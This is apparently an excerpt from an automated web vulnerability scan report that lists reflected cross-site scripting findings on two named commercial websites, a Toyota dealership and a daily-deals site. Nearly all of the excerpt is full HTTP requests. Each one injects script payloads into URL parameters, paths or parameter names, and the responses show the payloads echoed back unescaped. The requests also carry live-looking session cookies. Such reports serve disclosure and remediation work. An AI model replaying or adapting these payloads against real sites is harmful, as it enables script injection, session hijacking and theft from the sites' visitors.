GET /inventory.php?VehicleType?=New&Model=a42a8"><script>alert(1)</script>0d87e64093f HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:18:52 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 39937
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>a42a8"><script>alert(1)</script>0d87e64093f Inventory Search - Fremont Toyota - Toyota - Servi ...[SNIP]... <meta name="description" content="Search our online inventory for a42a8"><script>alert(1)</script>0d87e64093f at Fremont Toyota in Fremont, California! Call us today at (510) 252-5100, or visit us at 5851 Cushing Pkwy., Fremont, California 94538."> ...[SNIP]...
The value of the Model request parameter is copied into the HTML document as plain text between tags. The payload 186d3<script>alert(1)</script>6628cbde463 was submitted in the Model parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType?=New&Model=186d3<script>alert(1)</script>6628cbde463 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:30:14 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 39866
The value of the VehicleType request parameter is copied into the HTML document as plain text between tags. The payload 5f0c1<script>alert(1)</script>e9ac330026e was submitted in the VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType=New5f0c1<script>alert(1)</script>e9ac330026e&Model=Avalon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:12:27 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 36915
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New5f0c1<script>alert(1)</script>e9ac330026e Avalon Inventory Search - Fremont Toyota - Toyota ...[SNIP]... </script>e9ac330026e">New5f0c1<script>alert(1)</script>e9ac330026e</option> ...[SNIP]...
The value of the VehicleType request parameter is copied into the HTML document as text between TITLE tags. The payload c87f9</title><script>alert(1)</script>11529c905b3 was submitted in the VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType=Newc87f9</title><script>alert(1)</script>11529c905b3&Model=Avalon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:15:21 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 37084
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Newc87f9</title><script>alert(1)</script>11529c905b3 Avalon Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watsonville - Fremont California</title> ...[SNIP]...
The value of the VehicleType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d11d"><script>alert(1)</script>c4314ee6845 was submitted in the VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType=New5d11d"><script>alert(1)</script>c4314ee6845&Model=Avalon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:59:20 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 36984
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New5d11d"><script>alert(1)</script>c4314ee6845 Avalon Inventory Search - Fremont Toyota - Toyo ...[SNIP]... <meta name="description" content="Search our online inventory for New5d11d"><script>alert(1)</script>c4314ee6845 Avalon at Fremont Toyota in Fremont, California! Call us today at (510) 252-5100, or visit us at 5851 Cushing Pkwy., Fremont, California 94538."> ...[SNIP]...
4.243. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fremonttoyota.com
Path:
/inventory.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7dc73<script>alert(1)</script>6f853fa5542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType=New&Model=Av/7dc73<script>alert(1)</script>6f853fa5542alon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:57:55 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 38100
4.244. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fremonttoyota.com
Path:
/inventory.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload dd0f1</title><script>alert(1)</script>bcf7d816ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType=New&Model=Av/dd0f1</title><script>alert(1)</script>bcf7d816ea4alon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:59:08 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 38277
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New Av/dd0f1</title><script>alert(1)</script>bcf7d816ea4alon Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watsonville - Fremont California</title> ...[SNIP]...
4.245. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fremonttoyota.com
Path:
/inventory.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b4e9"><script>alert(1)</script>7970917bb6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType=New&Model=Av/6b4e9"><script>alert(1)</script>7970917bb6falon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:51:59 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 38171
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New Av/6b4e9"><script>alert(1)</script>7970917bb6falon Inventory Search - Fremont Toyota - Toy ...[SNIP]... <meta name="description" content="Search our online inventory for New Av/6b4e9"><script>alert(1)</script>7970917bb6falon at Fremont Toyota in Fremont, California! Call us today at (510) 252-5100, or visit us at 5851 Cushing Pkwy., Fremont, California 94538."> ...[SNIP]...
The value of the model request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 578a7"><script>alert(1)</script>8773b9b6b60 was submitted in the model parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /quick-quote.html?model=Avalon578a7"><script>alert(1)</script>8773b9b6b60 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:12:18 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:12:19 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 14884
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Quick Quote - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - ...[SNIP]... <input id="model" type="text" name="model" value="Avalon578a7"><script>alert(1)</script>8773b9b6b60" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9017"><script>alert(1)</script>d8d5c2668c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/CPO+te9017"><script>alert(1)</script>d8d5c2668c4 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:49:33 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 92925
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdb32"><script>alert(1)</script>d4195370fae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/New+2011+Toyota+Avalon+tymMcdb32"><script>alert(1)</script>d4195370fae HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:46:38 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 64264
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbcf8"><script>alert(1)</script>3b4cd676d5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/New+2011+Toyota+Sienna+tymMcbcf8"><script>alert(1)</script>3b4cd676d5f HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:50:21 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 82785
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88857"><script>alert(1)</script>eca77acbb6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/New+Toyota+tm88857"><script>alert(1)</script>eca77acbb6b HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:51:22 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 83473
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - S ...[SNIP]... <a class="mm4-button mm4-button-plain mm4-button-pagination mm4-button-pagination-first" href="/search/New+Toyota+tm88857"><script>alert(1)</script>eca77acbb6b?page=1" title="First Page" > ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d30d"><script>alert(1)</script>2c5ff91a0a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/Used+Toyota+tm6d30d"><script>alert(1)</script>2c5ff91a0a3 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:47:38 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 92176
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Used Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - ...[SNIP]... <a class="mm4-button mm4-button-plain mm4-button-pagination mm4-button-pagination-first" href="/search/Used+Toyota+tm6d30d"><script>alert(1)</script>2c5ff91a0a3?page=1" title="First Page" > ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f86fc"><script>alert(1)</script>5832daa7887 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/Used+tf86fc"><script>alert(1)</script>5832daa7887 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:49:23 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 91252
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Used Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving ...[SNIP]... <a class="mm4-button mm4-button-plain mm4-button-pagination mm4-button-pagination-first" href="/search/Used+tf86fc"><script>alert(1)</script>5832daa7887?page=1" title="First Page" > ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb30a<img%20src%3da%20onerror%3dalert(1)>f3a4e14984 was submitted in the REST URL parameter 1. This input was echoed as bb30a<img src=a onerror=alert(1)>f3a4e14984 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /contactbb30a<img%20src%3da%20onerror%3dalert(1)>f3a4e14984 HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:52:49 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=3905F56D6FE0512FA942277F966A9ADC.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:56:01 GMT; Path=/ Content-Length: 66
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ef19<img%20src%3da%20onerror%3dalert(1)>10c36fd08c4 was submitted in the REST URL parameter 1. This input was echoed as 4ef19<img src=a onerror=alert(1)>10c36fd08c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /eb4ef19<img%20src%3da%20onerror%3dalert(1)>10c36fd08c4 HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:51:27 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=B0C2AC088E202D464E506CDABF5916E0.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:54:39 GMT; Path=/ Content-Length: 62
